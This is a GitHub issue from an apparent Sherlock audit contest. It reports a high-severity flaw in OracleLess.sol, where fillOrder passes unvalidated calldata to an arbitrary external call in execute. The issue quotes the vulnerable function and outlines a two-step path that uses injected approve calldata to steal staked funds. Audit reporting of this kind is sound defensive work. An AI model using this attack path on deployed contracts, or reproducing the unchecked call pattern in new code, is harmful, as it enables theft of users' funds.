Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Formal Cornflower Halibut - Open call in OracleLess.sol can be used for unauthorized calling #891

Open
sherlock-admin3 opened this issue Dec 9, 2024 · 0 comments
Open

Formal Cornflower Halibut - Open call in OracleLess.sol can be used for unauthorized calling #891

sherlock-admin3 opened this issue Dec 9, 2024 · 0 comments

Comments

@sherlock-admin3
Copy link
Contributor

Formal Cornflower Halibut

High

Open call in OracleLess.sol can be used for unauthorized calling

Summary

Users can fill OracleLess order with any pending order ERC20 address and use the open call in OracleLess::execute by filling the order through fillOrder to execute approve and steal all the staked funds.

Root Cause

There is no data validation in fillorder which can be used to pass arbitrary data to OracleLess::execute function and this function performs a open call

   function execute(
        address target,
        bytes calldata txData,
        Order memory order
    ) internal returns (uint256 amountOut, uint256 tokenInRefund) {
        //update accounting
        uint256 initialTokenIn = order.tokenIn.balanceOf(address(this));
        uint256 initialTokenOut = order.tokenOut.balanceOf(address(this));

        //approve
        order.tokenIn.safeApprove(target, order.amountIn);

        //perform the call
        (bool success, bytes memory reason) = target.call(txData);

        if (!success) {
            revert TransactionFailed(reason);
        }

        uint256 finalTokenIn = order.tokenIn.balanceOf(address(this));
        require(finalTokenIn >= initialTokenIn - order.amountIn, "over spend");
        uint256 finalTokenOut = order.tokenOut.balanceOf(address(this));

        require(
            finalTokenOut - initialTokenOut > order.minAmountOut,
            "Too Little Received"
        );

        amountOut = finalTokenOut - initialTokenOut;
        tokenInRefund = order.amountIn - (initialTokenIn - finalTokenIn);
    }

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

1 Attacker checks for the highest staked tokens in OracleLess or any ERC20
2 Then executes a fillOrder function call with txData to call approve function on any ERC-20 token address as target parameter and authorize attacker's address for spending funds

Impact

Stealing of funds

PoC

No response

Mitigation

No response
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sherlock-admin3